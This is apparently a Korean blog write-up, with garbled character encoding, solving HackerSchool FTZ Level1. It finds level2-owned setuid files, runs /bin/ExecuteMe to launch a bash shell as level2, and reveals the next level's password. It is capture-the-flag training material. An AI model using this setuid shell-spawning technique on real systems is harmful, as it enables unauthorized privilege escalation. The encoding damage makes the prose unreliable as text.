๐Ÿ”’ CTF (Dreamhack)/System Hacking (์‹œ์Šคํ…œํ•ดํ‚น)

[HackerSchool] ํ•ด์ปค์Šค์ฟจ FTZ: Level1

์„ ๋‹ฌ 2022. 10. 5. 20:07
๋ฐ˜์‘ํ˜•

FTZ Level ๋ฌธ์ œ๋“ค์—์„œ ์ตœ์ข… ๋ชฉํ‘œ๋Š” my-pass ๋ช…๋ น์–ด๋กœ

๋‹ค์Œ ๋ ˆ๋ฒจ์— ํ•ด๋‹นํ•˜๋Š” ๋น„๋ฒˆ์„ ์ฐพ์•„๋‚ด๋Š” ๊ฒƒ์ด๋‹ค.

๊ทธ๋ฆฌ๊ณ  my-pass ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•˜๋ ค๋ฉด

๊ทธ ๋ ˆ๋ฒจ์— ํ•ด๋‹นํ•˜๋Š” ๊ถŒํ•œ์„ ์–ป์–ด์•ผํ•œ๋‹ค


 

level1 (๋น„๋ฒˆ๋„ level1) ์œผ๋กœ ๋กœ๊ทธ์ธํ•˜๊ณ  ์„ฑ๊ณตํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ์ฐฝ์ด ๋œฌ๋‹ค

์•ˆ๋–ด๋‹ค๋ฉด ์„ธํŒ…์ด ์ž˜ ๋˜์–ด์žˆ๋Š”์ง€ ํ™•์ธํ•˜์ž

Xshell 7 (Build 0113)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ 

Connecting to 192.168.176.128:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

WARNING! The remote SSH server rejected X11 forwarding request.
[level1@ftz level1]$

 

ํ˜„์žฌ ๊ฒฝ๋กœ์— ์žˆ๋Š” ํŒŒ์ผ๋“ค์„ ์ฐพ์•„๋ณด์ž.

$ ls -a

[level1@ftz level1]$ ls -a
.   .bash_history  .bash_profile  .cshrc  .epems  .gvimrc  .muttrc   public_html  .viminfo  .Xauthority
..  .bash_logout   .bashrc        .emacs  .gtkrc  hint     .profile  tmp          .vimrc    .Xdefaults

 

 

์•ž์œผ๋กœ ftz ๋ชจ๋“  ๋ฌธ์ œ์—์„œ cat hint๋ฅผ ํ†ตํ•ด ๋ฌธ์ œ์˜ ํžŒํŠธ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.

๊ทผ๋ฐ ๋ง๋งŒ ํžŒํŠธ์ง€ ์‚ฌ์‹ค์ƒ ํ•ด๋‹น ๋ ˆ๋ฒจ์˜ ๋ฌธ์ œ๊ฐ€ hint์— ์จ์žˆ๋‹ค๊ณ  ๋ด๋„ ๋ฌด๋ฐฉํ•˜๋‹ˆ ์•„๋ผ์ง€ ๋ง๊ณ  ํŒํŒ ์“ฐ์ž!

$ cat hint

[level1@ftz level1]$ cat hint


level2 ๊ถŒํ•œ์— setuid๊ฐ€ ๊ฑธ๋ฆฐ ํŒŒ์ผ์„ ์ฐพ๋Š”๋‹ค.

 

 

ํ•˜์œ„ ๋””๋ ‰ํ† ๋ฆฌ(/) ์—์„œ setuid(4000) ๋ผ๋Š” ๊ถŒํ•œ(-perm)์„ ๊ฐ€์ง€๋Š” ํŒŒ์ผ๋“ค์„ ์ฐพ์ž(find)

$ find / -perm 4000

[level1@ftz level1]$ find / -perm 4000
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
...

 

 

๊ทผ๋ฐ ํŒŒ์ผ์ด ๊ฒ๋‚˜ ๋งŽ์ด ๋‚˜์˜จ๋‹ค...

์šฐ๋ฆฌ๋Š” ๋‹ค์Œ ๋‹จ๊ณ„์ธ Level2 ๋งŒ ์ฐพ์œผ๋ฉด ๋˜๋‹ˆ level2 ๋ผ๋Š” ์†Œ์œ ์ž (-user)๋ฅผ ๊ฐ€์ง„ ํŒŒ์ผ๋งŒ ์ฐพ์•„๋ณด์ž 

$ find / -user level2

[level1@ftz level1]$ find / -user level2
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
...
/bin/ExecuteMe
...
find: /home/trainer9: Permission denied

 

 

๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ๋งŽ์€ ํŒŒ์ผ๋“ค์ด ๋‚˜์˜ค๊ธด ํ•˜์ง€๋งŒ.. ๊ถŒํ•œ์ด ํ—ˆ์šฉ๋œ ํŒŒ์ผ์„ ์ฐพ์•˜๋‹ค!

๋ฐ”๋กœ ํ•ด๋‹น ํด๋”๋กœ ์ด๋™

$ cd /bin

[level1@ftz level1]$ cd /bin
[level1@ftz bin]$ ls
arch        bash2  cpio   dnsdomainname  env        grep      kbd_mode  ls      mt             ping   rvi        sort   true           vi
ash         bsh    csh    doexec         ex         gtar      kill      mail    mv             ps     rview      stty   umount         view
ash.static  cat    cut    domainname     ExecuteMe  gunzip    level7    mkdir   my-pass        pwd    sed        su     uname          ypdomainname
autodig     chgrp  date   dumpkeys       false      gzip      link      mknod   netstat        red    setfont    sync   unicode_start  zcat
awk         chmod  dd     echo           fgrep      hostname  ln        mktemp  nice           rm     setserial  tar    unicode_stop
basename    chown  df     ed             gawk       igawk     loadkeys  more    nisdomainname  rmdir  sh         tcsh   unlink
bash        cp     dmesg  egrep          gettext    ipcalc    login     mount   pgawk          rpm    sleep      touch  usleep

 

 

ํ•ด๋‹นํ•˜๋Š” ํŒŒ์ผ์„ ์‹คํ–‰ํ•œ๋‹ค. ๋ฐ”๋กœ !

$ ./ExecuteMe

[level1@ftz bin]$ ./ExecuteMe



		๋ ˆ๋ฒจ2์˜ ๊ถŒํ•œ์œผ๋กœ ๋‹น์‹ ์ด ์›ํ•˜๋Š” ๋ช…๋ น์–ด๋ฅผ
		ํ•œ๊ฐ€์ง€ ์‹คํ–‰์‹œ์ผœ ๋“œ๋ฆฌ๊ฒ ์Šต๋‹ˆ๋‹ค.
		(๋‹จ, my-pass ์™€ chmod๋Š” ์ œ์™ธ)

		์–ด๋–ค ๋ช…๋ น์„ ์‹คํ–‰์‹œํ‚ค๊ฒ ์Šต๋‹ˆ๊นŒ?
        
        [level2@ftz level2]$

 

๊ถŒํ•œ์€ ์–ป์—ˆ๋Š”๋ฐ ์ •์ž‘ ์ค‘์š”ํ•œ my-pass ๋Š” ์•ˆ๋œ๋‹จ๋‹ค..

๊ทธ๋Ÿผ my-pass ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ๋‚ด๋ฆด ์ˆ˜ ์žˆ๊ฒŒ ๋ช…๋ น์„ ๋‚ด๋ฆฌ์ž (!)

$ bash

[level2@ftz level2]$ bash


[level2@ftz level2]$

 

์ด์ œ level2๋ผ๋Š” ์œ ์ €๋กœ์„œ ๋ช…๋ น์„ ๋‚ด๋ฆด ์ˆ˜ ์žˆ๋‹ค.

$ my-pass

๋”๋ณด๊ธฐ
[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

 

๋ฐ˜์‘ํ˜•